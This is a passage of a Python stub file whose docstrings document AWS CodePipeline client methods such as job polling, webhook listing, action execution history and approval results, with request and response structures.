      - ``latestExecution`` *(dict)* -- The latest execution in the stage:
        ``pipelineExecutionId`` and ``status`` (``'InProgress'|'Failed'|'Succeeded'``).
    - ``created`` / ``updated`` *(datetime)* -- When the pipeline was created and
      last updated, in timestamp format.

    :type name: string
    :param name: **[REQUIRED]**
        The name of the pipeline about which you want to get information.
    :rtype: dict
    :returns: A dict describing the current state of every stage and action.
    """
    pass
def get_third_party_job_details(self, jobId: str, clientToken: str) -> Dict:
    """
    Request the details of a job for a third party action. Only used for partner actions.

    .. warning::
        When this API is called, AWS CodePipeline returns temporary credentials for
        the Amazon S3 bucket used to store artifacts for the pipeline, if the action
        requires access to that Amazon S3 bucket for input or output artifacts.
        Additionally, this API returns any secret values defined for the action.

    See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/codepipeline-2015-07-09/GetThirdPartyJobDetails>`_

    **Request Syntax**
    ::
        response = client.get_third_party_job_details(
            jobId='string',
            clientToken='string'
        )

    **Response Structure**
    The response is a dict representing the output of a GetThirdPartyJobDetails action:

    - ``jobDetails`` *(dict)* -- The details of the job, including any protected
      values defined for the job:
      - ``id`` *(string)* -- The identifier used to identify the job details in
        AWS CodePipeline.
      - ``data`` *(dict)* -- The data to be returned by the third party job worker:
        - ``actionTypeId`` *(dict)* -- The action type: ``category``
          (``'Source'|'Build'|'Deploy'|'Test'|'Invoke'|'Approval'``), ``owner``
          (``'AWS'|'ThirdParty'|'Custom'``), ``provider`` and ``version``.
        - ``actionConfiguration`` *(dict)* -- The ``configuration`` data for the action.
        - ``pipelineContext`` *(dict)* -- Information about the pipeline to a job
          worker: ``pipelineName``, ``stage`` (with ``name``), ``action`` (with
          ``name`` and ``actionExecutionId``), ``pipelineArn`` and
          ``pipelineExecutionId``.
          ``pipelineArn`` is the Amazon Resource Name (ARN) of the pipeline
          provided to the job worker, and ``pipelineExecutionId`` is the pipeline
          execution ID provided to the job worker.
          Does not include ``pipelineArn`` and ``pipelineExecutionId`` for
          ThirdParty jobs.
        - ``inputArtifacts`` *(list)* -- The artifacts to be worked upon by the
          action, each with ``name``, ``revision`` and an Amazon S3 ``location``
          (``type`` of ``'S3'`` and ``s3Location`` with ``bucketName``/``objectKey``).
          The input artifact name must match the name of an output artifact
          generated by an action in an earlier action or stage of the pipeline.
        - ``outputArtifacts`` *(list)* -- The artifacts that will be the result of
          the action, in the same shape as ``inputArtifacts``.
        - ``artifactCredentials`` *(dict)* -- Temporary AWS session credentials
          issued by AWS Secure Token Service (STS): ``accessKeyId``,
          ``secretAccessKey`` and ``sessionToken``. They can be used to access
          input and output artifacts in the Amazon S3 bucket used to store
          artifacts for the pipeline.
        - ``continuationToken`` *(string)* -- A system-generated token, such as an
          AWS CodeDeploy deployment ID, that a job requires in order to continue
          the job asynchronously.
        - ``encryptionKey`` *(dict)* -- The key (``id`` and ``type`` of ``'KMS'``)
          used to encrypt and decrypt data in the artifact store, such as an AWS
          Key Management Service (AWS KMS) key. Optional and might not be present.
    - ``nonce`` *(string)* -- A system-generated random number that AWS
      CodePipeline uses to ensure that the job is being worked on by only one job
      worker. Use this number in an AcknowledgeThirdPartyJob request.

    :type jobId: string
    :param jobId: **[REQUIRED]**
        The unique system-generated ID used for identifying the job.
    :type clientToken: string
    :param clientToken: **[REQUIRED]**
        The clientToken portion of the clientId and clientToken pair used to verify
        that the calling entity is allowed access to the job and its details.
    :rtype: dict
    :returns: The job details and a ``nonce`` for acknowledging the job.
    """
    pass
def get_waiter(self, waiter_name: str = None) -> Waiter:
    """
    Return an object that can wait for some condition to be reached.

    :type waiter_name: str
    :param waiter_name: The name of the waiter to get. For the list of available
        waiters, see the waiters section of the service documentation.
    :returns: The specified waiter object.
    :rtype: botocore.waiter.Waiter
    """
    pass
def list_action_executions(self, pipelineName: str, filter: Dict = None, maxResults: int = None, nextToken: str = None) -> Dict:
    """
    List the action executions that have occurred in a pipeline.

    See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/codepipeline-2015-07-09/ListActionExecutions>`_

    **Request Syntax**
    ::
        response = client.list_action_executions(
            pipelineName='string',
            filter={
                'pipelineExecutionId': 'string'
            },
            maxResults=123,
            nextToken='string'
        )

    **Response Structure**
    The response is a dict with two keys:

    - ``actionExecutionDetails`` *(list)* -- Details for a list of recent
      executions. Each entry describes one run of an action:
      - ``pipelineExecutionId`` / ``actionExecutionId`` *(string)* -- The pipeline
        execution ID and the action execution ID.
      - ``pipelineVersion`` *(integer)* -- The version of the pipeline where the
        action was run.
      - ``stageName`` / ``actionName`` *(string)* -- The stage containing the
        action, and the action's name.
      - ``startTime`` / ``lastUpdateTime`` *(datetime)* -- Start and last-update
        times of the action execution.
      - ``status`` *(string)* -- ``'InProgress'|'Succeeded'|'Failed'``.
      - ``input`` *(dict)* -- Input details: ``actionTypeId`` (``category``,
        ``owner``, ``provider``, ``version``), ``configuration``, ``roleArn``
        (the IAM service role assumed through the pipeline's roleArn), ``region``
        (for example us-east-1) and ``inputArtifacts`` (each with ``name`` and an
        ``s3location`` of ``bucket``/``key``).
      - ``output`` *(dict)* -- Output details: ``outputArtifacts`` (same shape as
        ``inputArtifacts``) and ``executionResult`` with
        ``externalExecutionId``, ``externalExecutionSummary`` and
        ``externalExecutionUrl`` (the deepest external link to the external
        resource used when running the action).
    - ``nextToken`` *(string)* -- If the amount of returned information is
      significantly large, an identifier usable in a subsequent
      ListActionExecutions call to return the next set of action executions.

    :type pipelineName: string
    :param pipelineName: **[REQUIRED]**
        The name of the pipeline for which you want to list action execution history.
    :type filter: dict
    :param filter:
        Input information used to filter action execution history.
        - **pipelineExecutionId** *(string) --*
          The pipeline execution ID used to filter action execution history.
    :type maxResults: integer
    :param maxResults:
        The maximum number of results to return in a single call. To retrieve the
        remaining results, make another call with the returned nextToken value.
        Action execution history is retained for up to 12 months, based on action
        execution start times. Default value is 100.
        .. note::
            Detailed execution history is available for executions run on or after
            February 21, 2019.
    :type nextToken: string
    :param nextToken:
        The token that was returned from the previous ListActionExecutions call,
        which can be used to return the next set of action executions in the list.
    :rtype: dict
    :returns: Action execution details plus an optional pagination token.
    """
    pass
def list_action_types(self, actionOwnerFilter: str = None, nextToken: str = None) -> Dict:
    """
    Get a summary of all AWS CodePipeline action types associated with your account.

    See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/codepipeline-2015-07-09/ListActionTypes>`_

    **Request Syntax**
    ::
        response = client.list_action_types(
            actionOwnerFilter='AWS'|'ThirdParty'|'Custom',
            nextToken='string'
        )

    **Response Structure**
    The response is a dict representing the output of a ListActionTypes action:

    - ``actionTypes`` *(list)* -- Details of each action type:
      - ``id`` *(dict)* -- The action type identifier: ``category``
        (``'Source'|'Build'|'Deploy'|'Test'|'Invoke'|'Approval'``), ``owner``
        (``'AWS'|'ThirdParty'|'Custom'``), ``provider`` and ``version``.
      - ``settings`` *(dict)* -- The action type's settings:
        ``thirdPartyConfigurationUrl`` (sign-up/initial configuration page for an
        external service), ``entityUrlTemplate`` (deep link to the external
        system's resources shown in the pipeline display),
        ``executionUrlTemplate`` (link to the execution entity of the external
        action shown on the pipeline view page) and ``revisionUrlTemplate``
        (page where customers can update or change the configuration of the
        external action).
      - ``actionConfigurationProperties`` *(list)* -- Configuration properties for
        the action type. Each has ``name``, ``required``, ``key``, ``secret``
        (secrets are hidden from all calls except GetJobDetails,
        GetThirdPartyJobDetails, PollForJobs, and PollForThirdPartyJobs),
        ``queryable`` (used with PollForJobs; at most one per custom action, and
        it must be required and not secret; its value is limited to 20
        alphanumeric, underscore, and hyphen characters), ``description`` and
        ``type`` (``'String'|'Number'|'Boolean'``).
      - ``inputArtifactDetails`` / ``outputArtifactDetails`` *(dict)* -- The
        ``minimumCount`` and ``maximumCount`` of artifacts allowed for the
        action type's inputs and outputs.
    - ``nextToken`` *(string)* -- If the amount of returned information is
      significantly large, an identifier usable in a subsequent list action types
      call to return the next set of action types.

    :type actionOwnerFilter: string
    :param actionOwnerFilter:
        Filters the list of action types to those created by a specified entity.
    :type nextToken: string
    :param nextToken:
        An identifier that was returned from the previous list action types call,
        which can be used to return the next set of action types in the list.
    :rtype: dict
    :returns: Action type summaries plus an optional pagination token.
    """
    pass
def list_pipeline_executions(self, pipelineName: str, maxResults: int = None, nextToken: str = None) -> Dict:
    """
    Get a summary of the most recent executions for a pipeline.

    See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/codepipeline-2015-07-09/ListPipelineExecutions>`_

    **Request Syntax**
    ::
        response = client.list_pipeline_executions(
            pipelineName='string',
            maxResults=123,
            nextToken='string'
        )

    **Response Structure**
    The response is a dict representing the output of a ListPipelineExecutions action:

    - ``pipelineExecutionSummaries`` *(list)* -- Executions in the history of a
      pipeline. Each summary contains:
      - ``pipelineExecutionId`` *(string)* -- The ID of the pipeline execution.
      - ``status`` *(string)* -- One of:
        * InProgress: The pipeline execution is currently running.
        * Succeeded: The pipeline execution was completed successfully.
        * Superseded: While this pipeline execution was waiting for the next
          stage to be completed, a newer pipeline execution advanced and
          continued through the pipeline instead.
        * Failed: The pipeline execution was not completed successfully.
      - ``startTime`` / ``lastUpdateTime`` *(datetime)* -- When the execution
        began and when it last changed, in timestamp format.
      - ``sourceRevisions`` *(list)* -- The source artifact revisions that
        initiated the execution, each with ``actionName``, ``revisionId``,
        ``revisionSummary`` (for GitHub and AWS CodeCommit repositories, the
        commit message; for Amazon S3 buckets or actions, the user-provided
        content of a ``codepipeline-artifact-revision-summary`` key in the
        object metadata) and ``revisionUrl`` (for artifacts stored in GitHub or
        AWS CodeCommit repositories, linked to a commit details page).
    - ``nextToken`` *(string)* -- A token that can be used in the next
      ListPipelineExecutions call. To view all items in the list, continue to
      call this operation with each subsequent token until no more nextToken
      values are returned.

    :type pipelineName: string
    :param pipelineName: **[REQUIRED]**
        The name of the pipeline for which you want to get execution summary information.
    :type maxResults: integer
    :param maxResults:
        The maximum number of results to return in a single call. To retrieve the
        remaining results, make another call with the returned nextToken value.
        Pipeline history is limited to the most recent 12 months, based on
        pipeline execution start times. Default value is 100.
    :type nextToken: string
    :param nextToken:
        The token that was returned from the previous ListPipelineExecutions call,
        which can be used to return the next set of pipeline executions in the list.
    :rtype: dict
    :returns: Execution summaries plus an optional pagination token.
    """
    pass
def list_pipelines(self, nextToken: str = None) -> Dict:
    """
    Get a summary of all of the pipelines associated with your account.

    See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/codepipeline-2015-07-09/ListPipelines>`_

    **Request Syntax**
    ::
        response = client.list_pipelines(
            nextToken='string'
        )

    **Response Structure**
    The response is a dict representing the output of a ListPipelines action:

    - ``pipelines`` *(list)* -- The list of pipelines. Each summary contains:
      - ``name`` *(string)* -- The name of the pipeline.
      - ``version`` *(integer)* -- The version number of the pipeline.
      - ``created`` *(datetime)* -- When the pipeline was created, in timestamp format.
      - ``updated`` *(datetime)* -- When the pipeline was last updated, in
        timestamp format.
    - ``nextToken`` *(string)* -- If the amount of returned information is
      significantly large, an identifier usable in a subsequent list pipelines
      call to return the next set of pipelines.

    :type nextToken: string
    :param nextToken:
        An identifier that was returned from the previous list pipelines call,
        which can be used to return the next set of pipelines in the list.
    :rtype: dict
    :returns: Pipeline summaries plus an optional pagination token.
    """
    pass
def list_webhooks(self, NextToken: str = None, MaxResults: int = None) -> Dict:
    """
    Gets a listing of all the webhooks in this region for this account. The output lists all webhooks and includes the webhook URL and ARN, as well as the configuration for each webhook.
    See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/codepipeline-2015-07-09/ListWebhooks>`_
    **Request Syntax**
    ::
    response = client.list_webhooks(
    NextToken='string',
    MaxResults=123
    )
    **Response Syntax**
    ::
    {
    'webhooks': [
    {
    'definition': {
    'name': 'string',
    'targetPipeline': 'string',
    'targetAction': 'string',
    'filters': [
    {
    'jsonPath': 'string',
    'matchEquals': 'string'
    },
    ],
    'authentication': 'GITHUB_HMAC'|'IP'|'UNAUTHENTICATED',
    'authenticationConfiguration': {
    'AllowedIPRange': 'string',
    'SecretToken': 'string'
    }
    },
    'url': 'string',
    'errorMessage': 'string',
    'errorCode': 'string',
    'lastTriggered': datetime(2015, 1, 1),
    'arn': 'string'
    },
    ],
    'NextToken': 'string'
    }
    **Response Structure**
    - *(dict) --*
    - **webhooks** *(list) --*
    The JSON detail returned for each webhook in the list output for the ListWebhooks call.
    - *(dict) --*
    The detail returned for each webhook after listing webhooks, such as the webhook URL, the webhook name, and the webhook ARN.
    - **definition** *(dict) --*
    The detail returned for each webhook, such as the webhook authentication type and filter rules.
    - **name** *(string) --*
    The name of the webhook.
    - **targetPipeline** *(string) --*
    The name of the pipeline you want to connect to the webhook.
    - **targetAction** *(string) --*
    The name of the action in a pipeline you want to connect to the webhook. The action must be from the source (first) stage of the pipeline.
    - **filters** *(list) --*
    A list of rules applied to the body/payload sent in the POST request to a webhook URL. All defined rules must pass for the request to be accepted and the pipeline started.
    - *(dict) --*
    The event criteria that specify when a webhook notification is sent to your URL.
    - **jsonPath** *(string) --*
    A JsonPath expression that will be applied to the body/payload of the webhook. The value selected by JsonPath expression must match the value specified in the matchEquals field, otherwise the request will be ignored. More information on JsonPath expressions can be found here: https://github.com/json-path/JsonPath.
    - **matchEquals** *(string) --*
    The value selected by the JsonPath expression must match what is supplied in the MatchEquals field, otherwise the request will be ignored. Properties from the target action configuration can be included as placeholders in this value by surrounding the action configuration key with curly braces. For example, if the value supplied here is "refs/heads/{Branch}" and the target action has an action configuration property called "Branch" with a value of "master", the MatchEquals value will be evaluated as "refs/heads/master". A list of action configuration properties for built-in action types can be found here: `Pipeline Structure Reference Action Requirements <https://docs.aws.amazon.com/codepipeline/latest/userguide/reference-pipeline-structure.html#action-requirements>`__ .
    - **authentication** *(string) --*
    Supported options are GITHUB_HMAC, IP and UNAUTHENTICATED.
    * GITHUB_HMAC implements the authentication scheme described here: https://developer.github.com/webhooks/securing/
    * IP will reject webhooks trigger requests unless they originate from an IP within the IP range whitelisted in the authentication configuration.
    * UNAUTHENTICATED will accept all webhook trigger requests regardless of origin.
    - **authenticationConfiguration** *(dict) --*
    Properties that configure the authentication applied to incoming webhook trigger requests. The required properties depend on the authentication type. For GITHUB_HMAC, only the SecretToken property must be set. For IP, only the AllowedIPRange property must be set to a valid CIDR range. For UNAUTHENTICATED, no properties can be set.
    - **AllowedIPRange** *(string) --*
    The property used to configure acceptance of webhooks within a specific IP range. For IP, only the AllowedIPRange property must be set, and this property must be set to a valid CIDR range.
    - **SecretToken** *(string) --*
    The property used to configure GitHub authentication. For GITHUB_HMAC, only the SecretToken property must be set.
    - **url** *(string) --*
    A unique URL generated by CodePipeline. When a POST request is made to this URL, the defined pipeline is started as long as the body of the post request satisfies the defined authentication and filtering conditions. Deleting and re-creating a webhook will make the old URL invalid and generate a new URL.
    - **errorMessage** *(string) --*
    The text of the error message about the webhook.
    - **errorCode** *(string) --*
    The number code of the error.
    - **lastTriggered** *(datetime) --*
    The date and time a webhook was last successfully triggered, in timestamp format.
    - **arn** *(string) --*
    The Amazon Resource Name (ARN) of the webhook.
    - **NextToken** *(string) --*
    If the amount of returned information is significantly large, an identifier is also returned and can be used in a subsequent ListWebhooks call to return the next set of webhooks in the list.
    :type NextToken: string
    :param NextToken:
    The token that was returned from the previous ListWebhooks call, which can be used to return the next set of webhooks in the list.
    :type MaxResults: integer
    :param MaxResults:
    The maximum number of results to return in a single call. To retrieve the remaining results, make another call with the returned nextToken value.
    :rtype: dict
    :returns:
    A dict with a ``webhooks`` list and, when more results are available, a ``NextToken`` key (see **Response Syntax** above).
    """
    pass
def poll_for_jobs(self, actionTypeId: Dict, maxBatchSize: int = None, queryParam: Dict = None) -> Dict:
    """
    Returns information about any jobs for AWS CodePipeline to act upon. PollForJobs is only valid for action types with "Custom" in the owner field. If the action type contains "AWS" or "ThirdParty" in the owner field, the PollForJobs action returns an error.
    .. warning::
    When this API is called, AWS CodePipeline returns temporary credentials for the Amazon S3 bucket used to store artifacts for the pipeline, if the action requires access to that Amazon S3 bucket for input or output artifacts. Additionally, this API returns any secret values defined for the action.
    See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/codepipeline-2015-07-09/PollForJobs>`_
    **Request Syntax**
    ::
    response = client.poll_for_jobs(
    actionTypeId={
    'category': 'Source'|'Build'|'Deploy'|'Test'|'Invoke'|'Approval',
    'owner': 'AWS'|'ThirdParty'|'Custom',
    'provider': 'string',
    'version': 'string'
    },
    maxBatchSize=123,
    queryParam={
    'string': 'string'
    }
    )
    **Response Syntax**
    ::
    {
    'jobs': [
    {
    'id': 'string',
    'data': {
    'actionTypeId': {
    'category': 'Source'|'Build'|'Deploy'|'Test'|'Invoke'|'Approval',
    'owner': 'AWS'|'ThirdParty'|'Custom',
    'provider': 'string',
    'version': 'string'
    },
    'actionConfiguration': {
    'configuration': {
    'string': 'string'
    }
    },
    'pipelineContext': {
    'pipelineName': 'string',
    'stage': {
    'name': 'string'
    },
    'action': {
    'name': 'string',
    'actionExecutionId': 'string'
    },
    'pipelineArn': 'string',
    'pipelineExecutionId': 'string'
    },
    'inputArtifacts': [
    {
    'name': 'string',
    'revision': 'string',
    'location': {
    'type': 'S3',
    's3Location': {
    'bucketName': 'string',
    'objectKey': 'string'
    }
    }
    },
    ],
    'outputArtifacts': [
    {
    'name': 'string',
    'revision': 'string',
    'location': {
    'type': 'S3',
    's3Location': {
    'bucketName': 'string',
    'objectKey': 'string'
    }
    }
    },
    ],
    'artifactCredentials': {
    'accessKeyId': 'string',
    'secretAccessKey': 'string',
    'sessionToken': 'string'
    },
    'continuationToken': 'string',
    'encryptionKey': {
    'id': 'string',
    'type': 'KMS'
    }
    },
    'nonce': 'string',
    'accountId': 'string'
    },
    ]
    }
    **Response Structure**
    - *(dict) --*
    Represents the output of a PollForJobs action.
    - **jobs** *(list) --*
    Information about the jobs to take action on.
    - *(dict) --*
    Represents information about a job.
    - **id** *(string) --*
    The unique system-generated ID of the job.
    - **data** *(dict) --*
    Additional data about a job.
    - **actionTypeId** *(dict) --*
    Represents information about an action type.
    - **category** *(string) --*
    A category defines what kind of action can be taken in the stage, and constrains the provider type for the action. Valid categories are limited to one of the values below.
    - **owner** *(string) --*
    The creator of the action being called.
    - **provider** *(string) --*
    The provider of the service being called by the action. Valid providers are determined by the action category. For example, an action in the Deploy category type might have a provider of AWS CodeDeploy, which would be specified as CodeDeploy. To reference a list of action providers by action type, see `Valid Action Types and Providers in CodePipeline <https://docs.aws.amazon.com/codepipeline/latest/userguide/reference-pipeline-structure.html#actions-valid-providers>`__ .
    - **version** *(string) --*
    A string that describes the action version.
    - **actionConfiguration** *(dict) --*
    Represents information about an action configuration.
    - **configuration** *(dict) --*
    The configuration data for the action.
    - *(string) --*
    - *(string) --*
    - **pipelineContext** *(dict) --*
    Represents information about a pipeline to a job worker.
    .. note::
    Includes ``pipelineArn`` and ``pipelineExecutionId`` for Custom jobs.
    - **pipelineName** *(string) --*
    The name of the pipeline. This is a user-specified value. Pipeline names must be unique across all pipeline names under an Amazon Web Services account.
    - **stage** *(dict) --*
    The stage of the pipeline.
    - **name** *(string) --*
    The name of the stage.
    - **action** *(dict) --*
    The context of an action to a job worker within the stage of a pipeline.
    - **name** *(string) --*
    The name of the action within the context of a job.
    - **actionExecutionId** *(string) --*
    The system-generated unique ID that corresponds to an action's execution.
    - **pipelineArn** *(string) --*
    The Amazon Resource Name (ARN) of the pipeline provided to the job worker.
    - **pipelineExecutionId** *(string) --*
    The execution ID of the pipeline provided to the job worker.
    - **inputArtifacts** *(list) --*
    The artifact supplied to the job.
    - *(dict) --*
    Represents information about an artifact that will be worked upon by actions in the pipeline.
    - **name** *(string) --*
    The artifact's name.
    - **revision** *(string) --*
    The artifact's revision ID. Depending on the type of object, this could be a commit ID (GitHub) or a revision ID (Amazon S3).
    - **location** *(dict) --*
    The location of an artifact.
    - **type** *(string) --*
    The type of artifact in the location.
    - **s3Location** *(dict) --*
    The Amazon S3 bucket that contains the artifact.
    - **bucketName** *(string) --*
    The name of the Amazon S3 bucket.
    - **objectKey** *(string) --*
    The key of the object in the Amazon S3 bucket, which uniquely identifies the object in the bucket.
    - **outputArtifacts** *(list) --*
    The output of the job.
    - *(dict) --*
    Represents information about an artifact that will be worked upon by actions in the pipeline.
    - **name** *(string) --*
    The artifact's name.
    - **revision** *(string) --*
    The artifact's revision ID. Depending on the type of object, this could be a commit ID (GitHub) or a revision ID (Amazon S3).
    - **location** *(dict) --*
    The location of an artifact.
    - **type** *(string) --*
    The type of artifact in the location.
    - **s3Location** *(dict) --*
    The Amazon S3 bucket that contains the artifact.
    - **bucketName** *(string) --*
    The name of the Amazon S3 bucket.
    - **objectKey** *(string) --*
    The key of the object in the Amazon S3 bucket, which uniquely identifies the object in the bucket.
    - **artifactCredentials** *(dict) --*
    Represents an AWS session credentials object. These credentials are temporary credentials that are issued by AWS Secure Token Service (STS). They can be used to access input and output artifacts in the Amazon S3 bucket used to store artifact for the pipeline in AWS CodePipeline.
    - **accessKeyId** *(string) --*
    The access key for the session.
    - **secretAccessKey** *(string) --*
    The secret access key for the session.
    - **sessionToken** *(string) --*
    The token for the session.
    - **continuationToken** *(string) --*
    A system-generated token, such as a AWS CodeDeploy deployment ID, that a job requires in order to continue the job asynchronously.
    - **encryptionKey** *(dict) --*
    Represents information about the key used to encrypt data in the artifact store, such as an AWS Key Management Service (AWS KMS) key.
    - **id** *(string) --*
    The ID used to identify the key. For an AWS KMS key, this is the key ID or key ARN.
    - **type** *(string) --*
    The type of encryption key, such as an AWS Key Management Service (AWS KMS) key. When creating or updating a pipeline, the value must be set to 'KMS'.
    - **nonce** *(string) --*
    A system-generated random number that AWS CodePipeline uses to ensure that the job is being worked on by only one job worker. Use this number in an AcknowledgeJob request.
    - **accountId** *(string) --*
    The ID of the AWS account to use when performing the job.
    :type actionTypeId: dict
    :param actionTypeId: **[REQUIRED]**
    Represents information about an action type.
    - **category** *(string) --* **[REQUIRED]**
    A category defines what kind of action can be taken in the stage, and constrains the provider type for the action. Valid categories are limited to one of the values below.
    - **owner** *(string) --* **[REQUIRED]**
    The creator of the action being called.
    - **provider** *(string) --* **[REQUIRED]**
    The provider of the service being called by the action. Valid providers are determined by the action category. For example, an action in the Deploy category type might have a provider of AWS CodeDeploy, which would be specified as CodeDeploy. To reference a list of action providers by action type, see `Valid Action Types and Providers in CodePipeline <https://docs.aws.amazon.com/codepipeline/latest/userguide/reference-pipeline-structure.html#actions-valid-providers>`__ .
    - **version** *(string) --* **[REQUIRED]**
    A string that describes the action version.
    :type maxBatchSize: integer
    :param maxBatchSize:
    The maximum number of jobs to return in a poll for jobs call.
    :type queryParam: dict
    :param queryParam:
    A map of property names and values. For an action type with no queryable properties, this value must be null or an empty map. For an action type with a queryable property, you must supply that property as a key in the map. Only jobs whose action configuration matches the mapped value will be returned.
    - *(string) --*
    - *(string) --*
    :rtype: dict
    :returns:
    A dict with a ``jobs`` list describing the jobs to act on (see **Response Syntax** above).
    """
    pass
def poll_for_third_party_jobs(self, actionTypeId: Dict, maxBatchSize: int = None) -> Dict:
    """
    Determines whether there are any third party jobs for a job worker to act on. Only used for partner actions.
    .. warning::
    When this API is called, AWS CodePipeline returns temporary credentials for the Amazon S3 bucket used to store artifacts for the pipeline, if the action requires access to that Amazon S3 bucket for input or output artifacts.
    See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/codepipeline-2015-07-09/PollForThirdPartyJobs>`_
    **Request Syntax**
    ::
    response = client.poll_for_third_party_jobs(
    actionTypeId={
    'category': 'Source'|'Build'|'Deploy'|'Test'|'Invoke'|'Approval',
    'owner': 'AWS'|'ThirdParty'|'Custom',
    'provider': 'string',
    'version': 'string'
    },
    maxBatchSize=123
    )
    **Response Syntax**
    ::
    {
    'jobs': [
    {
    'clientId': 'string',
    'jobId': 'string'
    },
    ]
    }
    **Response Structure**
    - *(dict) --*
    Represents the output of a PollForThirdPartyJobs action.
    - **jobs** *(list) --*
    Information about the jobs to take action on.
    - *(dict) --*
    A response to a PollForThirdPartyJobs request returned by AWS CodePipeline when there is a job to be worked upon by a partner action.
    - **clientId** *(string) --*
    The clientToken portion of the clientId and clientToken pair used to verify that the calling entity is allowed access to the job and its details.
    - **jobId** *(string) --*
    The identifier used to identify the job in AWS CodePipeline.
    :type actionTypeId: dict
    :param actionTypeId: **[REQUIRED]**
    Represents information about an action type.
    - **category** *(string) --* **[REQUIRED]**
    A category defines what kind of action can be taken in the stage, and constrains the provider type for the action. Valid categories are limited to one of the values below.
    - **owner** *(string) --* **[REQUIRED]**
    The creator of the action being called.
    - **provider** *(string) --* **[REQUIRED]**
    The provider of the service being called by the action. Valid providers are determined by the action category. For example, an action in the Deploy category type might have a provider of AWS CodeDeploy, which would be specified as CodeDeploy. To reference a list of action providers by action type, see `Valid Action Types and Providers in CodePipeline <https://docs.aws.amazon.com/codepipeline/latest/userguide/reference-pipeline-structure.html#actions-valid-providers>`__ .
    - **version** *(string) --* **[REQUIRED]**
    A string that describes the action version.
    :type maxBatchSize: integer
    :param maxBatchSize:
    The maximum number of jobs to return in a poll for jobs call.
    :rtype: dict
    :returns:
    A dict with a ``jobs`` list of ``clientId``/``jobId`` pairs (see **Response Syntax** above).
    """
    pass
def put_action_revision(self, pipelineName: str, stageName: str, actionName: str, actionRevision: Dict) -> Dict:
    """
    Provides information to AWS CodePipeline about new revisions to a source.
    See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/codepipeline-2015-07-09/PutActionRevision>`_
    **Request Syntax**
    ::
    response = client.put_action_revision(
    pipelineName='string',
    stageName='string',
    actionName='string',
    actionRevision={
    'revisionId': 'string',
    'revisionChangeId': 'string',
    'created': datetime(2015, 1, 1)
    }
    )
    **Response Syntax**
    ::
    {
    'newRevision': True|False,
    'pipelineExecutionId': 'string'
    }
    **Response Structure**
    - *(dict) --*
    Represents the output of a PutActionRevision action.
    - **newRevision** *(boolean) --*
    Indicates whether the artifact revision was previously used in an execution of the specified pipeline.
    - **pipelineExecutionId** *(string) --*
    The ID of the current workflow state of the pipeline.
    :type pipelineName: string
    :param pipelineName: **[REQUIRED]**
    The name of the pipeline that will start processing the revision to the source.
    :type stageName: string
    :param stageName: **[REQUIRED]**
    The name of the stage that contains the action that will act upon the revision.
    :type actionName: string
    :param actionName: **[REQUIRED]**
    The name of the action that will process the revision.
    :type actionRevision: dict
    :param actionRevision: **[REQUIRED]**
    Represents information about the version (or revision) of an action.
    - **revisionId** *(string) --* **[REQUIRED]**
    The system-generated unique ID that identifies the revision number of the action.
    - **revisionChangeId** *(string) --* **[REQUIRED]**
    The unique identifier of the change that set the state to this revision, for example a deployment ID or timestamp.
    - **created** *(datetime) --* **[REQUIRED]**
    The date and time when the most recent version of the action was created, in timestamp format.
    :rtype: dict
    :returns:
    A dict with ``newRevision`` and ``pipelineExecutionId`` keys (see **Response Syntax** above).
    """
    pass
def put_approval_result(self, pipelineName: str, stageName: str, actionName: str, result: Dict, token: str) -> Dict:
    """
    Provides the response to a manual approval request to AWS CodePipeline. Valid responses include Approved and Rejected.
    See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/codepipeline-2015-07-09/PutApprovalResult>`_
    **Request Syntax**
    ::
    response = client.put_approval_result(
    pipelineName='string',
    stageName='string',
    actionName='string',
    result={
    'summary': 'string',
    'status': 'Approved'|'Rejected'
    },
    token='string'
    )
    **Response Syntax**
    ::
    {
    'approvedAt': datetime(2015, 1, 1)
    }
    **Response Structure**
    - *(dict) --*
    Represents the output of a PutApprovalResult action.
    - **approvedAt** *(datetime) --*
    The timestamp showing when the approval or rejection was submitted.
    :type pipelineName: string
    :param pipelineName: **[REQUIRED]**
    The name of the pipeline that contains the action.
    :type stageName: string
    :param stageName: **[REQUIRED]**
    The name of the stage that contains the action.
    :type actionName: string
    :param actionName: **[REQUIRED]**
    The name of the action for which approval is requested.
    :type result: dict
    :param result: **[REQUIRED]**
    Represents information about the result of the approval request.
    - **summary** *(string) --* **[REQUIRED]**
    The summary of the current status of the approval request.
    - **status** *(string) --* **[REQUIRED]**
    The response submitted by a reviewer assigned to an approval action request.
    :type token: string
    :param token: **[REQUIRED]**
    The system-generated token used to identify a unique approval request. The token for each open approval request can be obtained using the GetPipelineState action and is used to validate that the approval request corresponding to this token is still valid.
    :rtype: dict
    :returns:
    A dict with an ``approvedAt`` timestamp (see **Response Syntax** above).
    """
    pass
def put_job_failure_result(self, jobId: str, failureDetails: Dict):
    """
    Represents the failure of a job as returned to the pipeline by a job worker. Only used for custom actions.
    See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/codepipeline-2015-07-09/PutJobFailureResult>`_
    **Request Syntax**
    ::
    response = client.put_job_failure_result(
    jobId='string',
    failureDetails={
    'type': 'JobFailed'|'ConfigurationError'|'PermissionError'|'RevisionOutOfSync'|'RevisionUnavailable'|'SystemUnavailable',
    'message': 'string',
    'externalExecutionId': 'string'
    }
    )
    :type jobId: string
    :param jobId: **[REQUIRED]**
    The unique system-generated ID of the job that failed. This is the same ID returned from PollForJobs.
    :type failureDetails: dict
    :param failureDetails: **[REQUIRED]**
    The details about the failure of a job.
    - **type** *(string) --* **[REQUIRED]**
    The type of the failure. Valid values are enumerated in the **Request Syntax** above.
    - **message** *(string) --* **[REQUIRED]**
    The message about the failure.
    - **externalExecutionId** *(string) --*
    The external ID of the run of the action that failed.
    :returns: None
    """
    pass
def put_job_success_result(self, jobId: str, currentRevision: Dict = None, continuationToken: str = None, executionDetails: Dict = None):
    """
    Represents the success of a job as returned to the pipeline by a job worker. Only used for custom actions. A job worker reports a completed job, or an in-progress one by supplying a ``continuationToken``.
